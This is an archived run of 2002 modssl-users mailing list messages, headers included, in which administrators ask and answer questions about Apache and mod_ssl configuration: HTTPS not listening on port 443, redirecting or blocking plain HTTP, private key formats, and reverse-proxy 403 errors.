	from portal1.visa.com id BAA19289; Tue, 11 Jun 2002 01:27:00 +0200 (MET DST)
Received: by portal1.visa.com id QAA13230
  (InterLock SMTP Gateway 4.2 for modssl-users@modssl.org);
  Mon, 10 Jun 2002 16:27:30 -0700
Received: by portal1.visa.com (Protected-side Proxy Mail Agent-1);
  Mon, 10 Jun 2002 16:27:30 -0700
Message-Id: <7FE1FAD6701BD21180ED0001FAD464A9032DA0DC@sw820x033.visa.com>
From: "Cordova, Silvio" 
To: "'modssl-users@modssl.org'" 
Subject: Apache 1.3.23 Problem
Date: Mon, 10 Jun 2002 16:26:51 -0700
Mime-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Cordova, Silvio" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am having trouble running Apache 1.3.23.  It will not listen on port 443
for https.  The server was started with "apachectl startssl" as per the
instructions, but it will only listen on port 80.  I was able to force it on
port 443, but it only works with http and not with https.  I am running it
on a Solaris v8 SPARC chip.

Any suggestions or ideas ?

Thanks,
Silvio Cordova
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 08:17:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA07162; Tue, 11 Jun 2002 08:16:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivivos.com id IAA07139; Tue, 11 Jun 2002 08:15:37 +0200 (MET DST)
Received: from elusion [66.57.168.62] by ivivos.com with ESMTP
  (SMTPD32-7.07) id A5B4191007E; Tue, 11 Jun 2002 02:16:20 -0400
From: "Chris Hsiang" 
To: 
Subject: RE: Apache 1.3.23 Problem
Date: Tue, 11 Jun 2002 02:16:19 -0400
Message-ID: <000701c2110f$80db1be0$0100a8c0@ivivos.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: <7FE1FAD6701BD21180ED0001FAD464A9032DA0DC@sw820x033.visa.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Hsiang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

In your http.conf, do you have a listen 443 directive?
Also 

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Cordova, Silvio
Sent: Monday, June 10, 2002 7:27 PM
To: 'modssl-users@modssl.org'
Subject: Apache 1.3.23 Problem

I am having trouble running Apache 1.3.23.  It will not listen on port
443
for https.  The server was started with "apachectl startssl" as per the
instructions, but it will only listen on port 80.  I was able to force
it on
port 443, but it only works with http and not with https.  I am running
it
on a Solaris v8 SPARC chip.

Any suggestions or ideas ?

Thanks,
Silvio Cordova
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 14:06:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA27820; Tue, 11 Jun 2002 14:05:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spiff.wake.tec.nc.us id OAA27800; Tue, 11 Jun 2002 14:04:47 +0200 (MET DST)
Received: from localhost (dale@localhost)
	by spiff.wake.tec.nc.us (AIX4.3/8.9.3/8.9.3) with ESMTP id IAA36744
	for ; Tue, 11 Jun 2002 08:02:35 -0400
Date: Tue, 11 Jun 2002 08:02:35 -0400 (EDT)
From: Dale Weaver 
X-Sender: dale@spiff
To: modssl-users@modssl.org
Subject: RE: How to disable part of the HTTP pages?
In-Reply-To: <000001c20fb1$78db6f30$0113030a@isengard>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dale Weaver 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I believe it is more accurate to redirect.  It causes less 
confusion:


ServerName  whatever
Redirect  permanent / https://whatever


Avoids confusion and irritation on the part of site visitors.

---------------------------------------------------------------------

When a true genius appears in the world, you may know him by
this sign; that the dunces are all in confederacy against him. 
    -- Jonathan Swift 
___

Dale Weaver                               dale@mail.wake.tec.nc.us
UNIX Systems Administrator                (919) 662-3508	
Wake Technical Community College          fax (919) 779-3360

On Sun, 9 Jun 2002, Han,Donghoon wrote:

> Put "Deny from all" in  
> in the vhost settings where the serving port is 80.
> 
> Ex)
> 
> BlahBlahBlah
> 
> 	Order Deny,Allow
> 	Deny from all
> 
> 
> 
> 
> BlahBlah
> 
> 	Order Allow,Deny
> 	Allow from all
> 
> 
> 
> Refer to the apache manual for further information.
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of lin geng
> Sent: Saturday, June 08, 2002 10:44 AM
> To: modssl-users@modssl.org
> Subject: RE: How to disable part of the HTTP pages?
> 
> Disable port 80.
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Conrad Ng
> Sent: Wednesday, June 05, 2002 8:47 PM
> To: modssl-users@modssl.org
> Subject: How to disable part of the HTTP pages?
> 
> 
> Dear all
> 
> After I have implemented the SSL technology in my servers, I understand
> that
> users can access securely under HTTPS://. However, they can still
> access through HTTP://. Is there any way to block people from
> accessing under HTTP:// ? I'm not meaning to block the whole port 80 but
> only some pages, is it belong to the settings of Apache or what? Please
> instruct. Thanks a lot!!
> 
> Regards
> 
> Conrad Ng
> 
> 
> ______________________________________________________
> 
> Scott Wilson Ltd celebrates its new name during its 50th year in Hong
> Kong!
> 
> This e-mail and any attachments to it are intended only for the party to
> whom they are addressed. They may contain privileged and/or confidential
> information. If you have received this transmission in error please
> notify
> the sender immediately and delete any digital copies and destroy any
> paper
> copies. Thank you.
> 
> Scott Wilson accepts no contractual liabilities or commitments arising
> from
> this e-mail unless subsequently confirmed by fax or letter or as an
> e-mail
> attachment giving company name, address, registration number and
> authorized
> signatory.
> ______________________________________________________
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 14:27:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA29113; Tue, 11 Jun 2002 14:26:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id OAA29108; Tue, 11 Jun 2002 14:26:01 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id IAA04285;
	Tue, 11 Jun 2002 08:26:14 -0400
Date: Tue, 11 Jun 2002 08:26:13 -0400 (EDT)
From: "R. DuFresne" 
To: Dale Weaver 
cc: modssl-users@modssl.org
Subject: RE: How to disable part of the HTTP pages?
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


This might depend upon what the site wants to do in the end.  Disabling
port 80 will help keep folks from popping in on http, it can be a bennie
for sites open only to a chosen few.  Redirects are good for sites open to
all and pushing clients to the https aspect.  So, it can depend upon what
the sites requirements are.

Thanks,

Ron DuFresne

On Tue, 11 Jun 2002, Dale Weaver wrote:

> 
> I believe it is more accurate to redirect.  It causes less 
> confusion:
> 
> 
> ServerName  whatever
> Redirect  permanent / https://whatever
> 
> 
> Avoids confusion and irritation on the part of site visitors.
> 
> ---------------------------------------------------------------------
> 
> When a true genius appears in the world, you may know him by
> this sign; that the dunces are all in confederacy against him. 
>     -- Jonathan Swift 
> ___
> 
> Dale Weaver                               dale@mail.wake.tec.nc.us
> UNIX Systems Administrator                (919) 662-3508	
> Wake Technical Community College          fax (919) 779-3360
> 
> On Sun, 9 Jun 2002, Han,Donghoon wrote:
> 
> > Put "Deny from all" in  
> > in the vhost settings where the serving port is 80.
> > 
> > Ex)
> > 
> > BlahBlahBlah
> > 
> > 	Order Deny,Allow
> > 	Deny from all
> > 
> > 
> > 
> > 
> > BlahBlah
> > 
> > 	Order Allow,Deny
> > 	Allow from all
> > 
> > 
> > 
> > Refer to the apache manual for further information.
> > 
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org] On Behalf Of lin geng
> > Sent: Saturday, June 08, 2002 10:44 AM
> > To: modssl-users@modssl.org
> > Subject: RE: How to disable part of the HTTP pages?
> > 
> > Disable port 80.
> > 
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org]On Behalf Of Conrad Ng
> > Sent: Wednesday, June 05, 2002 8:47 PM
> > To: modssl-users@modssl.org
> > Subject: How to disable part of the HTTP pages?
> > 
> > 
> > Dear all
> > 
> > After I have implemented the SSL technology in my servers, I understand
> > that
> > users can access securely under HTTPS://. However, they can still
> > access through HTTP://. Is there any way to block people from
> > accessing under HTTP:// ? I'm not meaning to block the whole port 80 but
> > only some pages, is it belong to the settings of Apache or what? Please
> > instruct. Thanks a lot!!
> > 
> > Regards
> > 
> > Conrad Ng
> > 
> > 
> > ______________________________________________________
> > 
> > Scott Wilson Ltd celebrates its new name during its 50th year in Hong
> > Kong!
> > 
> > This e-mail and any attachments to it are intended only for the party to
> > whom they are addressed. They may contain privileged and/or confidential
> > information. If you have received this transmission in error please
> > notify
> > the sender immediately and delete any digital copies and destroy any
> > paper
> > copies. Thank you.
> > 
> > Scott Wilson accepts no contractual liabilities or commitments arising
> > from
> > this e-mail unless subsequently confirmed by fax or letter or as an
> > e-mail
> > attachment giving company name, address, registration number and
> > authorized
> > signatory.
> > ______________________________________________________
> > 
> > 
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > 
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 15:38:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA02761; Tue, 11 Jun 2002 15:37:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mag06.bb.admin.ch id PAA02737; Tue, 11 Jun 2002 15:36:27 +0200 (MET DST)
From: Michael.Straessle@bk.admin.ch
Received: from mar01.bb.admin.ch (mar01.bb.admin.ch [193.5.222.71])
	by mag06.bb.admin.ch (8.11.2/8.11.2) with ESMTP id g5BDaQb08664
	for ; Tue, 11 Jun 2002 15:36:26 +0200 (METDST)
Received: from mas22.bb.admin.ch (mas22.bb.admin.ch [193.5.222.83])
	by mar01.bb.admin.ch (8.11.2/8.11.2) with SMTP id g5BDaQb28202
	for ; Tue, 11 Jun 2002 15:36:26 +0200 (METDST)
Received: by ad01007exc.ad.admin.ch with Internet Mail Service (5.5.2653.19)
	id ; Tue, 11 Jun 2002 15:36:25 +0200
Message-ID: 
To: modssl-users@modssl.org
Subject: Apache 2.0.37-dev +mod_ssl win32 binaries
Date: Tue, 11 Jun 2002 15:36:15 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael.Straessle@bk.admin.ch
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

for testing purposes, i have compiled a 2.0.37-dev snapshot on NT. as there
doesn't seem to be any apache 2 binaries with mod_ssl around, i have put
them in the modssl user contribution area. they are not intended to be used
in a production environment, of course ;-)

regards
michael


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 17:19:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA08525; Tue, 11 Jun 2002 17:18:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA08471; Tue, 11 Jun 2002 17:17:08 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B601B4CE79C; Tue, 11 Jun 2002 17:17:05 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 38B392898B; Tue, 11 Jun 2002 17:14:02 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from MAIL2.trans-it.de id QAA04872; Tue, 11 Jun 2002 16:14:20 +0200 (MET DST)
Received: from [145.228.60.90] by MAIL2.ntmail.trans-it.net (NTMail 7.00.0018/LG0061.00.9518a920) with ESMTP id qgfcmbaa for modssl-users@modssl.org; Tue, 11 Jun 2002 16:12:53 +0200
From: "Andre Steffens" 
To: "Apache mod_ssl" 
Subject: SSL Options in httpd.conf
Date: Tue, 11 Jun 2002 16:14:42 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Steffens" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I've two questions about Apache 2.0.36 with SSL on Win2k:

(1) Who can I create a SSL Certifikat? Up to day we use IIS. I've export an
.pem File - can I use this file?

(2) I want to have SSL required with a VirtualHost. What options do I have
to set in httpd.conf?

Thx
Andre
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 17:19:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA08534; Tue, 11 Jun 2002 17:18:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA08469; Tue, 11 Jun 2002 17:17:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A53C64CE79A; Tue, 11 Jun 2002 17:17:05 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A6D0828981; Tue, 11 Jun 2002 17:13:58 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web12706.mail.yahoo.com id QAA06585; Tue, 11 Jun 2002 16:48:16 +0200 (MET DST)
Message-ID: <20020611144644.73121.qmail@web12706.mail.yahoo.com>
Received: from [210.169.86.122] by web12706.mail.yahoo.com via HTTP; Tue, 11 Jun 2002 22:46:44 CST
Date: Tue, 11 Jun 2002 22:46:44 +0800 (CST)
From: =?iso-8859-1?q?Darin=20Davis?= 
Subject: Reverse Proxy 1.3.29 HTTPS works on NT - 403 forbidden on Solaris and Linux
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?q?Darin=20Davis?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We have setup a Reverse Proxy using Apache 1.3.24 on
Solaris, Linux and Windows NT all using mod_ssl-2.8.8.
 

On Windows NT the reverse proxy works on both HTTP and
HTTPS protocol.  On both Linux and Solaris 8 we get a
403 Forbidden error when trying to use HTTPS.  A HTTP
connection is successful.

The setup of the httpd.conf file on the Solaris, Linux
and Windows NT environments are exact copies of each
other - other than paths to files....

Any ideas why HTTPS would work on Windows NT and not
Linux or Solaris as a Reverse Proxy setup using
mod_proxy and mod_ssl?  

We really don't want to have to use a Windows NT box
if we can help it!

Any suggestions would be greatly appreciated.

Regards

Darin 

_______________________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com.hk address at http://mail.english.yahoo.com.hk
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 17:19:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA08541; Tue, 11 Jun 2002 17:18:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA08463; Tue, 11 Jun 2002 17:17:06 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 632C14CE792; Tue, 11 Jun 2002 17:17:05 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 7EEE72896C; Tue, 11 Jun 2002 17:13:14 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mag06.bb.admin.ch id KAA15570; Tue, 11 Jun 2002 10:58:39 +0200 (MET DST)
Received: from mar02.bb.admin.ch (mar02.bb.admin.ch [193.5.222.72])
	by mag06.bb.admin.ch (8.11.2/8.11.2) with ESMTP id g5B8wcb21357
	for ; Tue, 11 Jun 2002 10:58:38 +0200 (METDST)
Received: from MAS17.bb.admin.ch (mas17.bb.admin.ch [193.5.222.81])
	by mar02.bb.admin.ch (8.11.2/8.11.2) with SMTP id g5B8wcr05936
	for ; Tue, 11 Jun 2002 10:58:38 +0200 (METDST)
Received: from sl (sl.bk.admin.ch [131.102.25.246])
	by mag12.bb.admin.ch (8.11.2/8.11.2) with SMTP id g5B8wbk08229
	for ; Tue, 11 Jun 2002 10:58:37 +0200 (MEST)
Message-ID: <000701c21126$44eb5ca0$f6196683@bk.admin.ch>
From: "Michael Straessle" 
To: 
Subject: Apache 2.0.37-dev +mod_ssl win32 binaries
Date: Tue, 11 Jun 2002 10:59:17 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA15589
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael Straessle" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

for testing purposes, i have compiled a 2.0.37-dev snapshot on NT. as there doesn't seem to be any apache 2 binaries with mod_ssl around, i have put them in the modssl user contribution area. they are not intended to be used in a production environment, of course ;-)

regards
michael
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 17:19:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA08545; Tue, 11 Jun 2002 17:18:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA08465; Tue, 11 Jun 2002 17:17:06 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 724C84CE794; Tue, 11 Jun 2002 17:17:05 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 08C4528975; Tue, 11 Jun 2002 17:13:28 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lsa-st2.lsa-net.de id MAA23178; Tue, 11 Jun 2002 12:45:18 +0200 (MET DST)
Received: from Bastion-Hal-In.lsa-net.de (lsa-st200.sachsen-anhalt.de [164.133.154.130])
	by lsa-st2.lsa-net.de (8.9.3/8.9.3) with ESMTP id MAA19766
	for ; Tue, 11 Jun 2002 12:45:24 +0200
Received: (from root@localhost)
          by Bastion-Hal-In.lsa-net.de (8.9.1/8.8.4)
	  id MAA16498 for ; Tue, 11 Jun 2002 12:46:59 +0200
Received: from lsa-serv.lsa-net.de by KryptoWall via smtpp (Version 1.2.0) id kwa16109; Tue Jun 11 12:46:38 2002
Received: from lrpc4.lrz.mi.lsa-net.de (lrpc4.lrz.mi.lsa-net.de [164.133.96.139])
	by lsa-serv.lsa-net.de (8.11.2/8.8.6) with ESMTP id g5BAiuV22275
	for ; Tue, 11 Jun 2002 12:44:56 +0200
Received: from lrz.mi.lsa-net.de (lrz-ca.lrz.mi.lsa-net.de [164.133.96.135])
	by lrpc4.lrz.mi.lsa-net.de (8.12.1/8.12.1) with ESMTP id g5BAipmG004444
	for ; Tue, 11 Jun 2002 12:44:52 +0200
Message-ID: <3D05D4AE.DA37210F@lrz.mi.lsa-net.de>
Date: Tue, 11 Jun 2002 12:45:02 +0200
From: Robert Hannemann 
X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-4GB i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: PKCS#8 private Key
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by amavisd-milter (http://amavis.org/
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Hannemann 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all,

i've generated a PKCS#8 private key and a SSL-HTTP ServerCertificate
with openssl for my apache Server. But when i try to start apache in SSL
mode, i'll get the error: unable to load the privata key.
Is there (or will be in future) a way to use PKCS#8 private keys with
modssl? 

I use apache 1.3.24 with mod_ssl-2.8.8-1.3.24.

Thanks for your Help.
Regards,
Robert Hannemann
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 17:19:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA08551; Tue, 11 Jun 2002 17:18:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA08460; Tue, 11 Jun 2002 17:17:06 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 537104CE790; Tue, 11 Jun 2002 17:17:05 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id BE6E028704; Tue, 11 Jun 2002 17:12:55 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta3-rme.xtra.co.nz id IAA07612; Tue, 11 Jun 2002 08:28:19 +0200 (MET DST)
Received: from snoopy ([210.86.99.3]) by mta3-rme.xtra.co.nz with SMTP
          id <20020611062812.AKY21990.mta3-rme.xtra.co.nz@snoopy>
          for ; Tue, 11 Jun 2002 18:28:12 +1200
From: "Pj Pilley" 
To: 
Subject: RE: Apache 1.3.23 Problem
Date: Tue, 11 Jun 2002 18:43:18 +1200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: <7FE1FAD6701BD21180ED0001FAD464A9032DA0DC@sw820x033.visa.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pj Pilley" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Have you verified that when you start apache with apachectl startssl it is
actually starting ssl

e.g have you tried something like ps -ef | grep httpd
or something similar to that.

Failing that is there any messages that appear when you type apachectl
startssl.


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Cordova, Silvio
Sent: Tuesday, 11 June 2002 11:27 a.m.
To: 'modssl-users@modssl.org'
Subject: Apache 1.3.23 Problem


I am having trouble running Apache 1.3.23.  It will not listen on port 443
for https.  The server was started with "apachectl startssl" as per the
instructions, but it will only listen on port 80.  I was able to force it on
port 443, but it only works with http and not with https.  I am running it
on a Solaris v8 SPARC chip.

Any suggestions or ideas ?

Thanks,
Silvio Cordova
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 17:38:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA10110; Tue, 11 Jun 2002 17:37:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from MAIL2.trans-it.de id RAA10094; Tue, 11 Jun 2002 17:36:33 +0200 (MET DST)
Received: from [145.228.60.90] by MAIL2.ntmail.trans-it.net (NTMail 7.00.0018/LG0061.00.9518a920) with ESMTP id okjcmbaa for modssl-users@modssl.org; Tue, 11 Jun 2002 17:35:04 +0200
From: "Andre Steffens" 
To: 
Subject: AW: SSL Options in httpd.conf
Date: Tue, 11 Jun 2002 17:36:56 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: 
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Steffens" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> (1) How can I create a SSL Certifikat? Up to day we use IIS. I've
> export an .pem File - can I use this file?

I find OpenSSL, but when I start the cmd-line to create a certifcate an
error is shown: "unable to load config info" - where can I get this file
from?

cu Andre

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 18:40:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA15782; Tue, 11 Jun 2002 18:39:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from krusty.unitec.edu.ve id SAA15745; Tue, 11 Jun 2002 18:38:48 +0200 (MET DST)
